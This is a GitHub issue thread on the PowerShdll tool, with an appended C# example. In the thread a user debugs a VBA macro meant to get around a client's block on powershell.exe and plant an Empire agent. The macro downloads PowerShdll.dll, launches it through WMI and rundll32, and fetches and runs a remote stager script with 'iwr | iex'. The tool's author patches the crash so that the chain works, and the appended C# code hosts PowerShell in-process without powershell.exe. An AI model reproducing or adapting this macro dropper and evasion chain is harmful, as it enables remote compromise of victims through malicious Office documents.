p3nt4/PowerShdll

Execute PowerShdll from VBA macro

vivami opened this issue · 4 comments

First of all: thanks for this awesome project!

I'm trying to execute PowerShdll via a VBA macro (client blocks powershell.exe, and I want an Empire agent), by first downloading the dll (DownloadDLL()) and then executing the downloaded PowerShdll.dll by letting it download a script to execute (Empire stager). This works when I execute StrCmd in a cmd.exe, but does not work when executing it via the following VBA script:

Public Function Debugging() As Variant
    Dim StrCmd As String
    Dim strComputer As String
    Dim objWMIService As Object, objStartup As Object, objConfig As Object, objProcess As Object
    Dim intProcessID As Long

    ' Fetch PowerShdll.dll to disk first, then launch it through rundll32.
    DownloadDLL
    ' Command line handed to rundll32 unchanged, exactly as it was tested in cmd.exe.
    StrCmd = "C:\Windows\System32\rundll32.exe C:\Temp\PowerShdll.dll,main . { iwr -useb https://cl.ly/kgIa/stager.ps1 } ^| iex;"
    strComputer = "."
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    ' Win32_Process.Create starts the child from the WMI provider host (WmiPrvSE.exe),
    ' not from the Office process, so the child inherits no console.
    ' Create returns 0 on success; intProcessID receives the new PID.
    objProcess.Create StrCmd, Null, objConfig, intProcessID
End Function

Sub DownloadDLL()
    Dim myURL As String
    Dim WinHttpReq As Object
    Dim oStream As Object

    myURL = "https://github.com/p3nt4/PowerShdll/raw/master/dll/bin/x64/Release/PowerShdll.dll"

    ' Synchronous GET; responseBody holds the raw bytes of the DLL.
    Set WinHttpReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
    WinHttpReq.Open "GET", myURL, False
    WinHttpReq.send

    If WinHttpReq.Status = 200 Then
        ' Write the binary body to disk with ADODB.Stream
        ' (Type 1 = adTypeBinary, SaveToFile 2 = adSaveCreateOverWrite).
        Set oStream = CreateObject("ADODB.Stream")
        oStream.Open
        oStream.Type = 1
        oStream.Write WinHttpReq.responseBody
        oStream.SaveToFile "C:\Temp\PowerShdll.dll", 2
        oStream.Close
    End If
End Sub

This results in the following error message:

Problem signature:
  Problem Event Name:	CLR20r3
  Problem Signature 01:	rundll32.exe
  Problem Signature 02:	6.3.9600.17415
  Problem Signature 03:	54504eb8
  Problem Signature 04:	mscorlib
  Problem Signature 05:	4.0.30319.36366
  Problem Signature 06:	57a0f7f9
  Problem Signature 07:	4528
  Problem Signature 08:	9a
  Problem Signature 09:	System.IO.IOException
  OS Version:	6.3.9600.2.0.0.272.7
  Locale ID:	1033
  Additional Information 1:	6ebd
  Additional Information 2:	6ebd833e076778d4646eaf22a3f76243
  Additional Information 3:	e34d
  Additional Information 4:	e34d4e50642e55705797b1cdfa61a4c5

Any clue as to how I can fix this? Thanks in advance!

p3nt4 commented

I think I understand the problem. I used a trick to show the command output inside the current shell.
Basically, it steals the calling process' console and writes to it. In this context there is no shell so it will not work.
I will add an option to not show output.

p3nt4 commented

I added the -n switch to not redirect output. Should be ok now.
Please confirm.

vivami commented

Thanks! It works now, also without the -n switch.

p3nt4 commented

I moved the console hijacking bit after the script execution, so I assume it would crash after the command has been executed.
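The console trick p3nt4 describes in the comments above, as an added C# example that is not PowerShdll's own code: the DLL host attaches to the calling process's console with AttachConsole(ATTACH_PARENT_PROCESS), and when the parent owns no console (a process started through Win32_Process.Create is parented by WmiPrvSE.exe, not by the cmd.exe the command was tested in) that call fails with ERROR_INVALID_HANDLE. Checking that return value, honouring a -n switch that skips the console entirely, and only touching the console after the script has finished are the three fixes the thread converges on; here they are in one place. The rundll32 export plumbing is left out, the class names ParentConsole and DllHost are this example's own, and the csc reference to System.Management.Automation.dll is an assumption about the build environment.

```csharp
// Added example, not PowerShdll's own code. Hosts a PowerShell runspace
// in-process (no powershell.exe) and writes its output to the caller's
// console only if that console actually exists.
// Build (assumed): csc /r:System.Management.Automation.dll Host.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

public static class ParentConsole
{
    private const uint ATTACH_PARENT_PROCESS = 0xFFFFFFFF; // (DWORD)-1
    public const int ERROR_INVALID_HANDLE = 6;             // parent has no console
    public const int ERROR_ACCESS_DENIED = 5;              // we already own one

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool AttachConsole(uint dwProcessId);

    [DllImport("kernel32.dll", SetLastError = true)]
    private static extern bool FreeConsole();

    // Attach to whatever console the parent owns (cmd.exe's, or none at all
    // under WMI/Office). Returns null instead of throwing when there is none.
    public static TextWriter TryAttach(out int lastError)
    {
        lastError = 0;
        if (!AttachConsole(ATTACH_PARENT_PROCESS))
        {
            lastError = Marshal.GetLastWin32Error();
            return null;
        }
        // Standard output must be reopened after the attach: the handle the
        // runtime cached at startup belongs to a process that had no console.
        return new StreamWriter(Console.OpenStandardOutput()) { AutoFlush = true };
    }

    public static void Detach() { FreeConsole(); }
}

public static class DllHost
{
    // Run the script through the hosted runspace and collect everything as
    // text; nothing is written anywhere until the script has finished.
    public static string RunScript(string script)
    {
        var output = new StringBuilder();
        using (var runspace = RunspaceFactory.CreateRunspace())
        {
            runspace.Open();
            using (var ps = PowerShell.Create())
            {
                ps.Runspace = runspace;
                ps.AddScript(script);
                foreach (PSObject item in ps.Invoke())
                    output.AppendLine(item == null ? string.Empty : item.ToString());
                foreach (ErrorRecord err in ps.Streams.Error)
                    output.AppendLine("ERROR: " + err);
            }
        }
        return output.ToString();
    }

    // Entry point as a plain console app; a rundll32 "main" export would
    // receive the same argument string and do exactly this with it.
    public static int Main(string[] args)
    {
        bool quiet = args.Length > 0 && args[0] == "-n";   // mirrors the -n switch
        int skip = quiet ? 1 : 0;
        string script = string.Join(" ", args, skip, args.Length - skip);

        string result = RunScript(script);   // 1. execute first, console last

        if (quiet) return 0;                  // 2. -n: never touch the console

        int err;
        TextWriter console = ParentConsole.TryAttach(out err);
        if (console == null)
        {
            // 3. No parent console (ERROR_INVALID_HANDLE under WMI/Office):
            //    degrade silently instead of crashing the host process.
            return err == ParentConsole.ERROR_INVALID_HANDLE ? 0 : err;
        }
        console.Write(result);
        console.Dispose();
        ParentConsole.Detach();
        return 0;
    }
}
```

Run from cmd.exe the output lands in that window; spawned through Win32_Process.Create from a macro the attach fails with error 6 and the script still completes, which is the behaviour vivami reports after the fix ("also without the -n switch").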